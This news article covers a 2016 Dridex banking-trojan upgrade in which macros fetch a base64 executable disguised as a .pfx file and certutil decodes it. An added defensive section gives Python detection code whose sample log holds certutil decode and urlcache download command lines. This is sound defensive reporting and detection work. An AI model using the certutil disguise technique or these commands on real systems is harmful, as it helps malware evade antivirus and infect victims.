New trick allows Dridex to bypass antivirus detection

Jun 3, 2016 02:40 GMT  ·  By

Dridex, one of the most infamous banking trojans of them all, received a major upgrade in May, one which security researchers say lets it bypass security software more easily.

For the past few years, Dridex has been one of the most active cyber-crime infrastructures on the planet. The group behind it has built several botnets through which it delivers malware, exfiltrates funds, hides illegal transactions and spams users, pushing both the Dridex banking trojan and the Locky ransomware.

Dormant Dridex makes a comeback

In the past, several security firms reported a downscaling of Dridex activity and an increased focus on Locky spam. Most recently, multiple security firms observed one of the biggest spam floods in years delivering the Locky ransomware.

But this lull seems to have ended, judging by Trend Micro's latest report, which says that on May 25 Dridex started making a comeback, with new waves of spam email once again distributing the notorious banking trojan in massive numbers.

The security firm also says that Dridex itself has now changed as well and is using a new trick to infect computers.

Dridex poses as a certificate to evade antivirus detection

In the past, the trojan relied on malicious Microsoft Office files that asked users to enable macro support. Once this happened, the malicious macro would download Dridex and install it on the victim's PC.

The most recent version of Dridex changes this M.O.: instead of downloading the Dridex executable directly, the macro script downloads a file with a PFX (Personal Information Exchange) extension. Genuine PFX files are PKCS#12 containers, normally used to bundle a certificate with its private key, and nothing in that format is meant to be executed.

"Perhaps, you are wondering why these cybercriminals added another layer in infecting systems," the Trend Micro team asks. "Since the file dropped is initially in .PFX format, it enables DRIDEX to bypass detection."

Antivirus and other security solutions generally recognize a file with a certificate extension as harmless and, having classified it once, may not rescan it, so the payload sits on disk unexamined until it is converted.

Dridex now abuses the built-in Windows Certutil utility

After the PFX file reaches the infected host, the same macro script that downloaded it launches Certutil, a command-line utility that ships with Windows as part of Certificate Services and is built specifically for handling certificates. It is present by default on current client and server versions of Windows, so the malware does not need to bring its own conversion tool.

Certutil's decode function turns the downloaded file, which is really a base64-encoded executable dressed up to look like a certificate, back into the Dridex EXE, which then infects the system. Because the antivirus has already classified the file as harmless, it no longer watches it, letting Dridex slip under the radar.
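The two sections above describe a disguise (a base64 text file carrying a .pfx extension) and a living-off-the-land step (certutil rebuilding the EXE from it). The following is an added example, written for this page rather than taken from Trend Micro's report or the malware itself, showing the two checks a defender would want: a content test that tells a genuine PKCS#12 file from a base64-wrapped PE image, and a scan over process-creation log lines that flags certutil.exe invoked with its decode or urlcache options, especially when an Office application is the parent. The log lines, their key=value layout and the field names (Image, CommandLine, ParentImage) are constructed for the example and are an assumption about the telemetry format; the file samples are likewise constructed.

```python
"""Added example (not code from Trend Micro, Softpedia or Dridex).

1. is_fake_pfx(): a real PFX/PKCS#12 file is DER-encoded binary whose first
   byte is an ASN.1 SEQUENCE tag (0x30). The file certutil turns into an EXE
   must instead be base64 text (certutil -decode strips -----BEGIN/END-----
   armor and base64-decodes the rest), so we decode the same way and look
   for a PE "MZ" header in the result.
2. flag_certutil_abuse(): scans constructed process-creation events for
   certutil.exe launched with -decode/-urlcache (certutil also accepts the
   /decode form) and rates the hit "high" when the parent is Office.
"""
import base64
import re
from typing import Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_FLAGS = {"-decode", "-decodehex", "-encode", "-urlcache"}
EVENT_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def is_real_pkcs12(data: bytes) -> bool:
    """Genuine PFX: DER-encoded PFX structure, starts with SEQUENCE (0x30)."""
    return len(data) > 2 and data[0] == 0x30


def decode_base64_payload(data: bytes) -> Optional[bytes]:
    """Mimic certutil -decode: drop armor lines and whitespace, base64-decode."""
    lines = [l.strip() for l in data.splitlines()
             if l.strip() and not l.strip().startswith(b"-----")]
    try:
        return base64.b64decode(b"".join(lines), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def is_fake_pfx(data: bytes) -> bool:
    """True when a '.pfx' is not PKCS#12 but base64 text hiding a PE image.

    A legitimate PEM certificate also decodes cleanly, but to DER (0x30...),
    not to an "MZ" header, so it is not flagged.
    """
    if is_real_pkcs12(data):
        return False
    payload = decode_base64_payload(data)
    return payload is not None and payload[:2] == b"MZ"


def parse_event(line: str) -> dict:
    """Parse a constructed key=value event line; values may be quoted."""
    return {k: v.strip('"') for k, v in EVENT_RE.findall(line)}


def flag_certutil_abuse(line: str) -> Optional[dict]:
    """Return a finding for certutil decode/urlcache use, or None."""
    ev = parse_event(line)
    image = ev.get("Image", "").lower()
    if not image.endswith("certutil.exe"):
        return None
    # Normalise "/decode" to "-decode" so both switch styles match.
    tokens = {("-" + t[1:]) if t.startswith("/") else t
              for t in ev.get("CommandLine", "").lower().split()}
    flags = SUSPICIOUS_FLAGS & tokens
    if not flags:
        return None
    parent = ev.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    severity = "high" if parent in OFFICE_PARENTS else "medium"
    return {"severity": severity, "flags": sorted(flags),
            "parent": parent, "cmd": ev.get("CommandLine")}


def scan_log(lines) -> list:
    """Run flag_certutil_abuse over every line, keeping only the hits."""
    return [hit for hit in (flag_certutil_abuse(l) for l in lines) if hit]


# Constructed samples: a fake ".pfx" that is a base64-armored PE stub, and the
# opening bytes of a genuine PKCS#12 container.
FAKE_PFX = (b"-----BEGIN CERTIFICATE-----\n"
            + base64.encodebytes(b"MZ\x90\x00" + b"\x00" * 60)
            + b"-----END CERTIFICATE-----\n")
REAL_PFX = b"\x30\x82\x0a\x1c\x02\x01\x03\x30\x82\x09\xd6"

# Constructed process-creation events (assumed key=value layout).
SAMPLE_LOG = [
    'EventID=1 Image="C:\\Windows\\System32\\certutil.exe" '
    'CommandLine="certutil -decode C:\\Users\\bob\\AppData\\Local\\Temp\\cert.pfx '
    'C:\\Users\\bob\\AppData\\Local\\Temp\\svc.exe" '
    'ParentImage="C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE"',
    'EventID=1 Image="C:\\Windows\\System32\\certutil.exe" '
    'CommandLine="certutil -verify -urlfetch C:\\certs\\corp.cer" '
    'ParentImage="C:\\Windows\\System32\\cmd.exe"',
    'EventID=1 Image="C:\\Windows\\System32\\certutil.exe" '
    'CommandLine="certutil /urlcache /split /f http://example.invalid/x.pfx C:\\Temp\\x.pfx" '
    'ParentImage="C:\\Windows\\System32\\cmd.exe"',
    'EventID=1 Image="C:\\Windows\\System32\\notepad.exe" CommandLine="notepad.exe" '
    'ParentImage="C:\\Windows\\explorer.exe"',
]

if __name__ == "__main__":
    print("fake pfx:", is_fake_pfx(FAKE_PFX), "real pfx:", is_fake_pfx(REAL_PFX))
    for hit in scan_log(SAMPLE_LOG):
        print(hit["severity"], hit["flags"], hit["parent"])
```

The second sample line (certutil -verify on a .cer file) is the kind of legitimate administrative use that a naive "any certutil" rule would drown in; keying on the decode and download switches, and on the parent process, keeps the alert useful.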

Reminding employees (and friends) once again not to open attachments from unknown senders remains the first line of defence, but it is not the only one: the technique itself is easy to spot. Certutil being launched by an Office application, or invoked with its decode or urlcache options on a file in a user's temp folder, is rarely legitimate and is worth alerting on.

Geographical distribution of recent Dridex infections